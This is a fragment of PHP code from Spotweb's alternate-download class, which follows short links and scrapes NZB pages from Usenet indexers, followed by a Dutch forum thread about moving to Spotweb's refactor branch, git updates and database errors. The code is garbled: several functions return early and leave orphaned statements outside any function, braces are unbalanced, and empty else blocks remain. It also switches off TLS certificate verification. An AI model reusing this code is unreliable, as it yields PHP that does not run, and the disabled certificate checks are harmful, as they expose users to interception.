'http://www.dereferer.org',
'http://tiny.cc',
'http://bit.ly',
'http://hideref.org',

);

// Search in the website url
if(isset($this->spot['website'])) {
foreach ($matches as $needle) {
if (strpos($this->spot['website'], $needle) !== false) {
// Stop search we have a match
$this->alternateDownloadUrl = $this->resolveUrl($this->spot['website']);
return true;
}
}
}

// We have no alternate yet lets spider the description.
if (isset($this->spot['description'])) {
foreach ($matches as $needle) {
if (strpos($this->spot['description'], $needle) !== false) {

// Stop search we have a match, get the url from the description
$url = false;
preg_match('/\>('.str_replace('/','\/',preg_quote($needle)).'.*)\</',$this->spot['description'], $matches);

if(isset($matches[1])) {
$url = $matches[1];
}

if ($url) {
$this->alternateDownloadUrl = $this->resolveUrl($url);
return true;
}
}
}
}

$this->nzb = false;
return false;
}

/**
*
* Find the alternate url
* @param String $data String containing alternate url.
*/
protected function resolveUrl($url, $currentUrl=false, $retries=0) {

if(strpos($url, 'hideref.org')){
$arr = explode('/64/', $url);
$tresult = base64_decode($arr[1]);
return $tresult;
}

if(!function_exists('curl_init')) {
trigger_error('cURL is needed to resolve alternate download urls.', E_NOTICE);
return $url;
}

// Initialize curl and follow redirects.
$ch = curl_init($url);
$chOptions = array(
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_FAILONERROR => 1,
CURLOPT_CONNECTTIMEOUT => 30,
CURLOPT_HEADER => TRUE,
CURLOPT_NOBODY => TRUE,
CURLOPT_SSL_VERIFYPEER => FALSE,
CURLOPT_SSL_VERIFYHOST => FALSE,
);

// Only use these curl options if no open base dir is set and php mode is off.
$manualResolving = true;
if (ini_get('open_basedir') == '' && ini_get('safe_mode') == false) {
$manualResolving = false;
$chOptions[CURLOPT_FOLLOWLOCATION] = true;
$chOptions[CURLOPT_MAXREDIRS] = 20;
}

curl_setopt_array($ch, $chOptions);

// Execute (save responce to var for manual following redirects)
$header = curl_exec($ch);

// Check if any error occured
if(!curl_errno($ch))
{
$finalUrl = curl_getinfo($ch, CURLINFO_EFFECTIVE_URL);
$HTTPcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Close handle
curl_close($ch);

if ($finalUrl) {
// We found the final url let return it.
if($currentUrl == $finalUrl) {
return $finalUrl;
}

// We have a php config using safe mode or open_basedir.
// Lets do some manual matching for redirects.
if ($manualResolving) {

if ($HTTPcode == 301 || $HTTPcode == 302) {
preg_match('/Location:(.*?)\n/', $header, $matches);
$url = trim(array_pop($matches));
}

// We found a redirect url inside the page.
if ($url != $finalUrl) {
// Lets try to resolve this again there might be more redirects.
// Recursive call.
if ($retries == 20) {
// Lets stop trying recursive we have to many redirects.
return $url;
}

// Recursive call coming up :)
// Do no return we need to continue for meta refresh checks.
$finalUrl = $this->resolveUrl($url, $url,$retries++);
}

}

// Lets try to find a meta refresh on the page of the current url.
$url = $this->resolveMetaRefreshOnUrl($finalUrl);

// We found a meta refresh url inside the page.
if ($url != $finalUrl) {
// Lets try to resolve this again there might be more redirects.
// Recursive call.
if ($retries == 2) {
// Lets stop trying recursive we have to many redirects.
return $url;
}

return $this->resolveUrl($url, $url,$retries++);
}

return $finalUrl;
}
} else {
trigger_error(curl_errno($ch) . ': ' . curl_error($ch));
}

// Close handle (will occur on error)
curl_close($ch);

// Return input url, due to error the url could not be resolved.
return $url;
}

/**
*
* Checks for a meta refresh tag on the page given by url.
* Returns the new url if one is found. If there is no new url it will return the input url.
*
* @param String $url
*/
protected function resolveMetaRefreshOnUrl($url)
{
trigger_error('cURL is needed to resolve meta refresh urls.', E_NOTICE);
return $url;
}
$url = trim($url);

// Initialize curl
$ch = curl_init($url);
$chOptions = array(
CURLOPT_ENCODING => '',
CURLOPT_NOBODY => FALSE,
);

// Execute
$body = curl_exec($ch);

if(!curl_errno($ch))
{

// Get the url.
if (preg_match('/meta.+?http-equiv\W+?refresh/i',$body)) {
preg_match('/content.+?url\W+?(.+?)\"/i',$body,$matches);
if(isset($matches[1])) {
$url = $matches[1];
}
}

// Close handle
curl_close($ch);

return $url;
} else {
}

curl_close($ch);

// Return input url, due to error the url could not be resolved.
return $url;
}

/**
*
* Check if we have an url and return it if there is one.
* @return String returns the url or null
*/
function getUrlForSpot() {
if(!$this->hasUrlForSpot()) {
$this->nzb = false;
return null;
}

return $this->alternateDownloadUrl;
}

public function hasNzb()
{
// Check if we can get an nzb.
if ($this->getNzb()) {
return true;
}

return false;
}

/**
*
* Returns nzb file in xml format.
*/
public function getNzb()
{
if ($this->nzb) {
// \O/ We already found an nzb before. Return the xml!
return $this->nzb;
} else if ($this->nzb === false) {
// We already did a curl request and this results in a badly formed xml.
return null;
}

trigger_error('cURL is needed to get the nzb xml.', E_NOTICE);
return null;
}

// Get the alternate url.
$url = $this->getUrlForSpot();

// If there is no alternate url return;
if (!$url) {
$this->nzb = false;
return null;
}

// Initialize curl.
$ch = curl_init($url);
$chOptions = array(
CURLOPT_ENCODING => '',
CURLOPT_NOBODY => FALSE,
);

// Execute
$body = curl_exec($ch);

if(!curl_errno($ch))
{
// Close handle
curl_close($ch);
// Load the body into simplexml.
// If the xml is well formed this will result in true thus returning the xml.
// Suppress errors if the string is not well formed, where testing here.
if (@simplexml_load_string($body)) {
$this->nzb = $body;
return $this->nzb;
} else if($body) {
// we did not get a direct link to an nzb file.
// more parsing is needed t(*_*t)
$this->nzb = $this->downloadNzbFrom($url, $body);
return $this->nzb;
} else {
$this->nzb = false;
}
} else {
}

curl_close($ch);

// Return nothing we have a curl error.
return null;
}

/**
*
* Cases for calling the specific parse methods
*
* @param String $url
* @param String $body
*/
protected function downloadNzbFrom($url, $body) {
// Binsearch
if (strpos($url, 'binsearch.info') !== FALSE) {
return $this->downloadNzbFromBinsearch($url, $body);
}

// NZB Index
if (strpos($url, 'nzbindex.nl') !== FALSE) {
// This function does not use the $body var.
return $this->downloadNzbFromNzbindex($url);
}

// NZB Club
if (strpos($url, 'nzbclub.com') !== FALSE) {
// This function does not use the $body var.
return $this->downloadNzbFromNzbclub($url);
}

// No support found return ;(
return false;
}

/**
*
* Tries to download the actual nzb from binsearch
*
* @param String $url
* @param String $body
*/
protected function downloadNzbFromBinsearch($url, $body) {
// Match to get the nzb id.
preg_match('/\q\=([a-z0-9]*)&*/i', $url, $matches);

// This match is essential for the download
if (!count($matches)) {
return false;
}

// Hardcoded download url.
$downloadUrl = 'http://www.binsearch.info/fcgi/nzb.fcgi?q=' . $matches[1];

$dom = new DOMDocument;

// Suppress errors, html does not have to be well formed to function.
@$dom->loadHTML( $body );
$ids = array();

// Fetch table rows from the result page.
foreach( $dom->getElementsByTagName( 'tr' ) as $tr ) {

// Only continue parsing if the search query is found in the tr.
if (strpos($tr->nodeValue, $matches[1]) !== false) {

// Get all input fields.
$fields = $tr->getElementsByTagName('input');

// Check type, we need the checkbox :)
foreach($fields as $input) {
if($input->getAttribute('type') == 'checkbox') {

// walk up the DOM tree and check if the next element has the string in the name.
// this way we only have the download rows left.
if(
$input->parentNode &&
$input->parentNode->nextSibling
&& strpos($input->parentNode->nextSibling->nodeValue, $matches[1]) !== false)
{

// Push name to array. This name is needed to fetch the download.
$ids[] = $input->getAttribute('name');
}
}

}

}
}

// Fetch the last id assuming our download was the first to post.
// This step is to prevent accidental porn downloads.
$id = null;
if (count($ids)) {
$id = array_pop($ids);
}

// Withoud an id where not going to be able to get the nzb.
if(!$id){
return false;
}

$postdata = array(
'action' => 'nzb',
$id => $id
);

return $this->postAndDownloadNzb($downloadUrl, $postdata);
}

/**
*
* Tries to download the actual nzb from nzbindex
*
* @param String $url
* @param String $body
*/
protected function downloadNzbFromNzbindex($url) {
// New curl request to get the page again
// This time do a request with the cookie that accepts the Disclaimer agreement.

// Initialize curl.
$ch = curl_init($url);
$chOptions = array(
CURLOPT_ENCODING => '',
CURLOPT_NOBODY => FALSE,
CURLOPT_COOKIE => 'agreed=true'
);

// Execute
$body = curl_exec($ch);

if(curl_errno($ch))
{
return false;
}

// Close handle
curl_close($ch);

// Match to get the nzb id.
preg_match('/\q\=([a-z0-9]*)&/i', $url, $matches);

// This match is essential for the download
if (!count($matches)) {
return false;
}

$dom = new DOMDocument;

// Suppress errors, html does not have to be well formed to function.
@$dom->loadHTML( $body );

// Fetch a tags from the result page.
foreach( $dom->getElementsByTagName( 'a' ) as $a ) {

// Search for the direct nzb download link :)
if(trim(strtolower($a->nodeValue)) == 'download') {
$url = $a->getAttribute('href');

if(strpos($url, $matches[1]) !== false) {
// We just found a direct download link for our url.
// No need for posting, just another get using curl.
return $this->getAndDownloadNzb($url);
}
}
}

// Could not find the right download link.
return false;
}

/**
*
* Tries to download the actual nzb from nzbclub
*
* @param String $url
*/
protected function downloadNzbFromNzbclub($url) {
$downloadUrl = str_replace('nzb_view', 'nzb_get', $url) . 'nzb';
return $this->getAndDownloadNzb($downloadUrl);
}

/**
*
* Execute a POST to the given url and return the body.
* @param String $url
* @param array $postdata
*/
protected function postAndDownloadNzb($url, Array $postdata) {

$fields_string = null;
foreach($postdata as $key=>$value) {
$fields_string .= $key.'='.urlencode($value).'&';
}
rtrim($fields_string, '&');

// Initialize curl.
$ch = curl_init($url);
$chOptions = array(
CURLOPT_ENCODING => '',
CURLOPT_NOBODY => FALSE,
CURLOPT_POST => TRUE,
CURLOPT_POSTFIELDS => $fields_string
);

// Execute
$body = curl_exec($ch);

if(!curl_errno($ch))
{
// Close handle
curl_close($ch);

return $body;
} else {
return false;
}

} else {
}

return false;
}

/**
*
* Curl GET return xml or false if not well formed.
* @param String $url
*/
protected function getAndDownloadNzb($url)
{
// Initialize curl.
$ch = curl_init($url);
$chOptions = array(
CURLOPT_ENCODING => '',
CURLOPT_NOBODY => FALSE,
);

// Execute
$body = curl_exec($ch);

if(!curl_errno($ch))
{
// Close handle
curl_close($ch);

return $body;
} else {
return false;
}
} else {
}

curl_close($ch);

return false;
}
}

"May our framerates be high and our temperatures low."

Acties:
  • 0 Henk 'm!

• remcoXP
  • Registratie: Februari 2002
  • Laatst online: 17-09 12:53
zijn er al vette andere skins voor refactored branch?
of een goede template voor mobile?

Gadget-freakz.com. Feedback en tips zijn welkom.

Acties:
  • 0 Henk 'm!

• renzo4000
remcoXP schreef op donderdag 17 oktober 2013 @ 09:53:
zijn er al vette andere skins voor refactored branch?
of een goede template voor mobile?
Dat is ook wel iets wat ik mis, goede templates! Met name voor de mobile versie zou dit geen kwaad kunnen, die "iphone" look kan echt niet meer.

Acties:
  • 0 Henk 'm!

• MikeOO
MikeOO schreef op donderdag 17 oktober 2013 @ 07:53:
[...]

Bedenk wel dat dit alleen voor de master branch werkt. Als je de refactor versie gebruikt dan werkt nog steeds niet. https://github.com/spotweb/spotweb/issues/1919.
Ze zijn er gelukkig mee bezig voor de refactor branch.
https://github.com/spotweb/spotweb/issues/1813

Acties:
  • 0 Henk 'm!

• slommer
  • Registratie: April 2010
  • Laatst online: 09:47
Iemand enig idee hoe ik de refactor branch update met git?
Heb hier gezocht en op google voor andere branches maar zonder succes.
Als ik doe:
code:
1
git pull https://github.com/spotweb/spotweb.git refactor

krijg ik een berg van deze errors:
code:
1
2
3
4
5
6
7
8
9
10
11
12
.....
A       vendor/pchart/pImage.class.php
A       vendor/pchart/pPie.class.php
U       vendor/phpseclib/Crypt/Hash.php
A       vendor/phpseclib/Crypt/RSA.php
A       vendor/phpseclib/Crypt/Random.php
A       vendor/phpseclib/Math/BigInteger.php
A       vendor/ubb/SpotUbb_parser.php
A       vendor/ubb/TagHandler.inc.php
Pull is not possible because you have unmerged files.
Please, fix them up in the work tree, and then use 'git add/rm <file>'
as appropriate to mark resolution, or use 'git commit -a'.

download nu handmatig de zip en werkt ook maar git pull is toch stuk makkelijker :)

Acties:
  • 0 Henk 'm!

• CH4OS
  • Niet online

CH4OS

It's a kind of magic

slommer schreef op vrijdag 18 oktober 2013 @ 13:39:
Iemand enig idee hoe ik de refactor branch update met git?
Heb hier gezocht en op google voor andere branches maar zonder succes.
Als ik doe:
code:
1
git pull https://github.com/spotweb/spotweb.git refactor

krijg ik een berg van deze errors:
code:
1
2
3
4
5
6
7
8
9
10
11
12
.....
A       vendor/pchart/pImage.class.php
A       vendor/pchart/pPie.class.php
U       vendor/phpseclib/Crypt/Hash.php
A       vendor/phpseclib/Crypt/RSA.php
A       vendor/phpseclib/Crypt/Random.php
A       vendor/phpseclib/Math/BigInteger.php
A       vendor/ubb/SpotUbb_parser.php
A       vendor/ubb/TagHandler.inc.php
Pull is not possible because you have unmerged files.
Please, fix them up in the work tree, and then use 'git add/rm <file>'
as appropriate to mark resolution, or use 'git commit -a'.

download nu handmatig de zip en werkt ook maar git pull is toch stuk makkelijker :)
Terwijl het heel makkelijk is met git:
git reset --hard
git checkout -b refactor
git pull
Die git pull hoeft geloof ik niet per sé, maar doe ik altijd wel, om zeker te zijn dat de inhoud die nodig is er is.

Acties:
  • 0 Henk 'm!

• slommer
  • Registratie: April 2010
  • Laatst online: 09:47
CptChaos schreef op vrijdag 18 oktober 2013 @ 13:44:
[...]
Terwijl het heel makkelijk is met git:
git reset --hard
git checkout -b refactor
git pull
Die git pull hoeft geloof ik niet per sé, maar doe ik altijd wel, om zeker te zijn dat de inhoud die nodig is er is.
Die had ik idd al gevonden maar errors blijven. ff wachten op de volgende up vanuit de zipped file.
Die geeft nu aan dat hij up2date is dus wie weet. thnx

Acties:
  • 0 Henk 'm!

• Cartman!
  • Registratie: April 2000
  • Niet online
Ik zie dat er iemand in de blacklist sta waar ik altijd graag posts van meepikte:

- kan ik deze persoon weer whitelisten?
- mis ik nu spots of comments van deze persoon?
- kan ik deze spots en comments weer terughalen na whitelisten?

Acties:
  • 0 Henk 'm!

• smeerbartje
  • Registratie: September 2006
  • Laatst online: 17-09 21:54
Ik heb het volgende gedaan nu:
  1. Type git clone https://github.com/spotweb/spotweb.git
  2. Type: git checkout -b refactor
Echter hoe zie ik nu of ik daadwerkelijk de refactored branch gebruik? Kan ik dit ergens zien in de GUI?

Acties:
  • 0 Henk 'm!

• MikeOO
smeerbartje schreef op maandag 21 oktober 2013 @ 07:49:
Echter hoe zie ik nu of ik daadwerkelijk de refactored branch gebruik? Kan ik dit ergens zien in de GUI?
Nu komt er een heel onverwachte oplossing >:)

git branch

[ Voor 19% gewijzigd door MikeOO op 21-10-2013 13:53 ]

Acties:
  • 0 Henk 'm!

• smeerbartje
Ok, ik zie nu inderdaad dat het de refactored branch is. Nu de laatste vraag: hoe kan ik deze refactored branch updaten? Een simpele "git pull" levert mij het volgende:

code:
1
2
3
4
5
6
7
8
9
10
11
There is no tracking information for the current branch.
Please specify which branch you want to merge with.
See git-pull(1) for details

git pull <remote> <branch>

If you wish to set tracking information for this branch you can do so with:

git branch --set-upstream-to=origin/<branch> refactor

me@host:/smb/spotweb_refactored$

Acties:
  • 0 Henk 'm!

• MikeOO
smeerbartje schreef op maandag 21 oktober 2013 @ 14:00:
Ok, ik zie nu inderdaad dat het de refactored branch is. Nu de laatste vraag: hoe kan ik deze refactored branch updaten? Een simpele "git pull" levert mij het volgende:

code:
1
2
3
4
5
6
7
8
9
10
11
There is no tracking information for the current branch.
Please specify which branch you want to merge with.
See git-pull(1) for details

git pull <remote> <branch>

If you wish to set tracking information for this branch you can do so with:

git branch --set-upstream-to=origin/<branch> refactor

me@host:/smb/spotweb_refactored$
Probeer onderstaand eens.
http://stackoverflow.com/...-git-pull-fails-in-branch

Anders de foutmelding in Google uitvoeren voor meer mogelijkheden.

Acties:
  • 0 Henk 'm!

• smeerbartje
Ik merk dat meer mensen hier last van hebben, zelfs mensen (zoals ik) met een schone install... heb daarom maar een topic aangemaakt: https://github.com/spotweb/spotweb/issues/1928

Acties:
  • 0 Henk 'm!

• Rowdy.nl
  • Registratie: Juni 2003
  • Laatst online: 18-09 14:48

Rowdy.nl

Koekje d'r bij?

smeerbartje schreef op dinsdag 22 oktober 2013 @ 08:47:
Ik merk dat meer mensen hier last van hebben, zelfs mensen (zoals ik) met een schone install... heb daarom maar een topic aangemaakt: https://github.com/spotweb/spotweb/issues/1928
Ik ben eergisteren overgegaan naar de refactor branch, ik heb wel het idee dat die enorm traag is...? Ligt dat aan mij of hebben meer mensen hier last van?

Sickbeard krijgt vaak timeouts bij het ophalen, ook een tig seconden voor het laden van een pagina is redelijk common bij de nieuwe install. Dual core AMD, zelfbouw met 4GB geheugen op Gentoo Linux. Verder eigenlijk nooit soortgelijke problemen ervaren, lijkt me niet echt hardwarematig. De master branch leek ook een stuk sneller? Ik heb wel een upgrade gedaan, oude meuk in de database misschien?

Rowdy.nl - X++ by day. C# by night. I drink coffee in the morning and beer in the evening.

Acties:
  • 0 Henk 'm!

• smeerbartje
Ok, wat blijkt nu: een simpele "git clone -b refactor https://github.com/spotweb/spotweb.git spotweb_refactor" does the trick :). Cool, de "refactor" branch draait nu én ik kan updaten middels git pull. Dus nu het zaakje instelleren en eenmalig via de console een php retrieve.php uitvoeren. Echter wat schetst mijn verbazing:

code:
1
2
3
Retrieving 1115225 till 1120226 (parsed: 5001, in DB: 0, signed: 0, invalid: 10, rtntn.skip: 4557, mod: 434, full: 0, total: 5001) in 6.71 seconds
Retrieving 1120226 till 1125227 (parsed: 5001, in DB: 0, signed: 0, invalid: 19, rtntn.skip: 4547, mod: 435, full: 0, total: 5001) in 8.88 seconds
Retrieving 1125227 till 1130228 (parsed: 5001, in DB: 0, signed: 0, invalid: 15, rtntn.skip: 4637, mod: 349, full: 0, total: 5001) in 6.88 seconds

Er komt dus verdomd weinig in de tabellen te staan. Het is allemaal invalid en "in DB: 0". Doe ik wederom iets verkeerd? Ik gebruik een (Eweka abonnement. Met de niet-refactor branch heb ik geen problemen met dit abonnement.

(en ja, die staat nu uit... het zijn dus niet de max. aantal open connections)

[ Voor 3% gewijzigd door smeerbartje op 23-10-2013 07:26 ]

Acties:
  • 0 Henk 'm!

• ShadowBumble
  • Nu online

ShadowBumble

Professioneel Prutser

Is de refactor branch dan uberhaupt al geschikt voor productie ? Ik ben destijds nog express niet over gegaan op refactor omdat deze nog te veel haken en ogen had om correct te kunnen draaien.

Al hoewel met de rewrite van de code zou het ook makelijk zijn om bijvoorbeeld plugins end ergelijks te creeren :D

"Allow me to shatter your delusions of grandeur."

Acties:
  • 0 Henk 'm!

• smeerbartje
ShadowBumble schreef op woensdag 23 oktober 2013 @ 09:17:
Is de refactor branch dan uberhaupt al geschikt voor productie ? Ik ben destijds nog express niet over gegaan op refactor omdat deze nog te veel haken en ogen had om correct te kunnen draaien.

Al hoewel met de rewrite van de code zou het ook makelijk zijn om bijvoorbeeld plugins end ergelijks te creeren :D
Ik ging er eigenlijk vanuit dat je met de refactor wel normaal spots op kunt halen?

Acties:
  • 0 Henk 'm!

• elevator
  • Niet online

elevator

Als je upgrade begint Spotweb eenmalig helemaal opnieuw alle spots te controleren of ie ze moet ophalen - dit was bij mij een erg snelle actie.

Jij hebt geconfigureerd dat je enkel spots 'later dan x' wilt hebben (zie je aan: rtntn.skip: 4637), en deze worden dan ook gewoon niet op gehaald door Spotweb.

Acties:
  • 0 Henk 'm!

• smeerbartje
Makes sense... thanks. Ik zou verwachten dat je dan ook niet aan de server vraagt om spots ouder dan de ingestelde datum. Wellicht is dit technisch niet mogelijk. Hoe dan ook; de spots waar ik WEL om vraag staan er nu prima in.

Acties:
  • 0 Henk 'm!

• ShadowBumble
  • Nu online

ShadowBumble

Professioneel Prutser

smeerbartje schreef op woensdag 23 oktober 2013 @ 09:36:
[...]

Ik ging er eigenlijk vanuit dat je met de refactor wel normaal spots op kunt halen?
Inmiddels is de refactor branch al een stuk verder als de laatste keer dat ik keek, gister avond even een
een test setup gemaakt in mijn ESXi omgeving.
Rowdy.nl schreef op dinsdag 22 oktober 2013 @ 09:15:
[...]
Ik ben eergisteren overgegaan naar de refactor branch, ik heb wel het idee dat die enorm traag is...? Ligt dat aan mij of hebben meer mensen hier last van?

De master branch leek ook een stuk sneller? Ik heb wel een upgrade gedaan, oude meuk in de database misschien?
Debian 7.2 netinst in de ESXi omgeving gegooid heb nu de refactor branch draaien op een ngix webserver met mysql en php optimizations, bij mij vliegt het redelijk over mijn scherm heen als ik eerlijk ben. Vrij vlot zie nog geen grote issues tot nu toe, maar moet wel zeggen dat ik met een volledig schone DB aan de slag ben gegaan.

Acties:
  • 0 Henk 'm!

• Tomba
  • Registratie: Mei 2000
  • Laatst online: 16-09 10:49

Tomba

Quis custodiet ipsos custodes?

Ik heb eigenlijk niet zo'n zin om alle spots opnieuw op te halen, maar de Refactor branch is toch wel interessant. Is al bekend of dit op een gegeven moment gewoon de Main branch wordt? (anders moet je straks nog een keer van branch switchten)
Iemand postieive ervaring met het updaten naar Refactor?

tomba.tweakblogs.net || Mijn V&A

Acties:
  • 0 Henk 'm!

• ShadowBumble
  • Nu online

ShadowBumble

Professioneel Prutser

Tomba schreef op donderdag 24 oktober 2013 @ 09:56:
Is al bekend of dit op een gegeven moment gewoon de Main branch wordt? (anders moet je straks nog een keer van branch switchten)
Uiteindelijk is Refactor een volledig rewrite en optimalisatie van de spotweb code, zodat het onderhoud en eventuele plugins extra features makelijker toegevoegd kunnen worden ( dit is met de master branch onmogelijk door de "vervuilde" code inmiddels ), uiteindelijk zal je dus zodra deze done is toch een upgrade moeten doen, en waarschijnlijk een database upgrade script dienen te runnen.
Tomba schreef op donderdag 24 oktober 2013 @ 09:56:
Iemand postieive ervaring met het updaten naar Refactor?
Volgens mij zijn de meeste hier van branch geswitched met een bestaande DB, bij de 1 hoor je wat meer problemen dan bij de ander maar dat kan dus komen omdat 1) de Database niet geoptimaliseerd is voor refactor of dat de db's gewoon waanzinnig groot zijn.

Deze bovenstaande reacties zie je in de topic toch nog wel terug komen, ik heb er voor gekozen om een hele nieuwe setup te bouwen omdat ik toch een aantal wijzigingen wou doorvoeren op de database en de conversie hiervan net zolang zou gaan duren als dat ik het opnieuw zou doen ( ik heb een 100% full db vanaf het begin van spotnet incl. FTD database ).

Mijn wijzigingen :

- innodb optimalisaties
- nieuwe database vanaf spots 1 januari 2013
- max spots nog maar 365 dagen oud

en nog wat meer wijzigingen maar das meer op webserver niveau Apache naar NGINX en compressie van static pages/frames en een php accelerators.

Acties:
  • 0 Henk 'm!

• smeerbartje
Misschien stomme vraag, maar bij mij draait Apache onder user www-data op mijn Ubuntu server. Stel nu dat ik spotweb wil downloaden middels "git clone REPO", onder welke user moet ik dat dan doen? Via sudo? Wat gebeurt er dan? De files die door git aan worden gemaakt, zijn dan onder user "root", toch? mag www-data ze dan wel bewerken?

Acties:
  • 0 Henk 'm!

• DennusB
  • Registratie: Mei 2006
  • Niet online
smeerbartje schreef op donderdag 24 oktober 2013 @ 15:52:
Misschien stomme vraag, maar bij mij draait Apache onder user www-data op mijn Ubuntu server. Stel nu dat ik spotweb wil downloaden middels "git clone REPO", onder welke user moet ik dat dan doen? Via sudo? Wat gebeurt er dan? De files die door git aan worden gemaakt, zijn dan onder user "root", toch? mag www-data ze dan wel bewerken?
Je kan daarna gewoon chown'en :-) Dan kan je ze van een andere user/groep maken!

Owner of DBIT Consultancy | DJ BassBrewer

Acties:
  • 0 Henk 'm!

• rikadoo
  • Registratie: Oktober 2007
  • Niet online
Ik heb Spotweb Easy, zo`n all in 1 pakket voor spotweb, draaid prima allemaal en heb ook de AlternativeDownload.php aangepast zodat die downloads ook gelijk worden doorgestuurd. Nu lees ik hier over refactor branch, hoe kan ik hierna upgraden bij Spotweb Easy?

AMD Ryzen 7 5900x | Custom WC | ASUS ROG Strix X570-E Gaming | 32GB Corsair DDR4-3600MHz | Samsung 970 nvme 1TB | Samsung 860 EVO 2TB | AMD RX 6900XT 16GB | 1x Asus RoG XG27AQDMG | 1x LG UltraGear 27GL850

Acties:
  • 0 Henk 'm!

• ShadowBumble
  • Nu online

ShadowBumble

Professioneel Prutser

alles draait inpreciepe prima met de refactor branch alleen soms wel errors in de log

voornamelijk deze : Services_BWList_Retriever->retrieveWhiteList

[ Voor 6% gewijzigd door ShadowBumble op 24-10-2013 19:28 ]

Acties:
  • 0 Henk 'm!

• ralph0603
  • Registratie: September 2008
  • Niet online

ralph0603

No pain, no gain..

Ik ben al heel de nacht bezig, maar ik krijg het niet voor elkaar. Ik moet het `dbsettings.in.php` uploaden naar de server.

Gaat allemaal prima, totdat ik dus mijn database gegevens moet uploaden naar de server, geen idee hoe ik dat doe in OMW.

- Installeer via de plugins pagina in OMV: MySQL
- Installeer via het kopje MySQL in de OMV pagina PHPmyAdmin
- Maak een via phpmyadmin een nieuwe gebruiker aan met een database. Genaamd spotweb
- Maak verbinding met OMV via SSH (Putty), gebruik root/ en voer de volgende commando’s uit.
wget https://github.com/spotweb/spotweb/tarball/master
tar -xvzf master
sudo mv spotweb-spotweb-* /var/www/openmediavault/spotweb
rm master
- Ga nu naar http:///spotweb/install.php
- Volg de stappen en maak in de laatste stap het bestand waarom gevraagd wordt en zet dit in de map waar spotweb geïnstalleerd is.
- Voer via SSH (Putty) het volgende commando uit.
cd /var/www/openmediavault/spotweb/
php upgrade-db.php

http://kippesik.nl/?p=489

Iemand hier ervaring mee?

Acties:
  • 0 Henk 'm!

• ShadowBumble
  • Nu online

ShadowBumble

Professioneel Prutser

dbsettings.inc.php moet je dan gewoon in je /var/www/openmediavault/spotweb gooien maar heb je in OMV ook de website plugin geinstalleerd ? Want je kan niet default meeliften op de webbrowser die je de webpage van OMV serveerd.

dbsettings.inc.php ziet er zo uit :

code:
1
2
3
4
5
6
<?php

Dus inloggen via ssh

cd /path/naar/spotweb/install
nano -w dbsettings.inc.php
en dan bovenstaande template gebruiken met je gegeven

CTRL-O om het op te slaan
CTRL-Q om af te sluiten

[ Voor 48% gewijzigd door ShadowBumble op 25-10-2013 08:59 ]

Acties:
  • 0 Henk 'm!

• ralph0603
  • Registratie: September 2008
  • Niet online

ralph0603

No pain, no gain..

Ik heb deze plugin ook even geinstalleerd zoals je aangaf, maar helaas zonder succes.
Als ik dit probeer weg te schrijven in SSH krijg ik bij het opslaan(ctrl+o) deze foutmelding: [ Fout tijdens schrijven van dbsettings.inc.php: Bestand of map bestaat niet ]

Acties:
  • 0 Henk 'm!

• Binnetie
  • Registratie: November 2000
  • Laatst online: 18-09 21:19
Ik heb al een hele tijd een spotweb installatie op een VPS van een kennis van mij staan. Deze deed het op zich aardig goed. Sinds een paar dagen krijgen ik alleen maar een witte pagina te zien wanneer ik naar mijn spotweb installatie surf. Die kennis heeft een backup teruggezet en het werkte weer tot de volgende dag. Nu ligt alles er weer uit.
Omdat ik via die VPS niet duidelijk krijg hoe ik Spotweb kan updaten (ik draai elke 2 uur een cronjob om de spots met comments bij te werken) wil ik alles maar eens opnieuw gaan installeren.

Wat kunnen jullie aanraden? Ik heb minimale kennis van PHP (zaken aanpassen n.a.v. een voorbeeld lukt me wel). Mooiste zou zijn een versie die makkelijk te updaten is. Voorheen uploade ik Spotweb naar de server toe en vandaaruit startte ik de install.php. Ik ga dan ook gelijk maar een nieuwe database aanlaten maken, want die van mij is nu al bijna een jaar oud denk ik.

Acties:
  • 0 Henk 'm!

• Mr_Blobby
  • Laatst online: 18-09 17:27
Ik probeer voor het eerst de refactor branch te gebruiken samen met mijn bestaande, grote spotweb database.
Zoals verwacht krijg ik een melding dat ik de database moet updaten.
Maar als ik dat doe dan krijg ik:
code:
1
Fatal error: Undefined class constant 'MYSQL_ATTR_FOUND_ROWS' in C:\UniServer\www\spotweb\lib\dbeng\dbeng_pdo_mysql.php on line 28

en zij zagen niet hoe spot in mij worstelde met verdriet

Acties:
  • 0 Henk 'm!

• strandbal
  • Registratie: Juli 2003
  • Laatst online: 09:44

strandbal

Was het maar zo'n feest.

Die krijg ik ook, ook na het switchen naar refactor. Nog geen oplossing voor gevonden helaas.

Hier stond een dode link.

Acties:
  • 0 Henk 'm!

• Mr_Blobby
  • Laatst online: 18-09 17:27
strandbal schreef op zaterdag 26 oktober 2013 @ 12:59:
Die krijg ik ook, ook na het switchen naar refactor. Nog geen oplossing voor gevonden helaas.
Ok, dan ligt het dus niet aan mijn specifieke spotweb installatie.
Dus ik heb er maar een issue van gemaakt:
https://github.com/spotweb/spotweb/issues/1933

[Edit:]
Al opgelost.
Zie het bovenstaande issue voor de oplossing.

[ Voor 8% gewijzigd door Mr_Blobby op 26-10-2013 14:12 ]

en zij zagen niet hoe spot in mij worstelde met verdriet

Acties:
  • 0 Henk 'm!

• smeerbartje
Uuuuuh, wat is OMV?

Acties:
  • 0 Henk 'm!

• Hari-Bo
  • Laatst online: 00:30
Dat is OpenMediaVault een Debian distro voor NAS functionaliteit.

Bos Stern Service Onafhankelijke automotive dienstverlening; diagnose, codering, retrofit, sleutelservice, ECU en tuning. Projecten

Acties:
  • 0 Henk 'm!

• strandbal

strandbal

Was het maar zo'n feest.

Hier ook gelukt. Draai FreeBSD en miste de php_pdo_mysql module :)

Acties:
  • 0 Henk 'm!

• Jeronimo78
  • Registratie: Februari 2004
  • Laatst online: 18-06 06:41
Hoi allemaal

Thuis een aantal dingen veranderd, waaronder verhuizing naar glasvezel. Gelijk tijd om alles eens flink bij te werken mbt spotweb.
Had al een tijdje de laatste versie van spotweb draaien naast een oudere versie.
Nu ik overgestapt ben naar tweaknews als usenet provider heb ik de nieuwe versie daar ook aan gekoppeld. Werkt allemaal naar behoren, toch spelen er een paar vragen.
1) de huidige versie draait in een folder genaamd spotwebnieuw. Als ik deze rename naar spotweb dan krijg ik een server error 500. Vlgns mij moet ik dus ergens in de installatie aangeven waar de installatie staat. Maar ik kan niet vinden waar. Dus de vraag is, waar moet ik dat aanpassen?

2) nu ik bij tweaknews zit kan ik veel verder terug spots inzien. (voorheen bij xs4all was dat iets van 20 dagen max). Hoe kan ik checken of ik inmiddels alles binnen heb aan (historische) spots?

Hartelijk dank voor de antwoorden

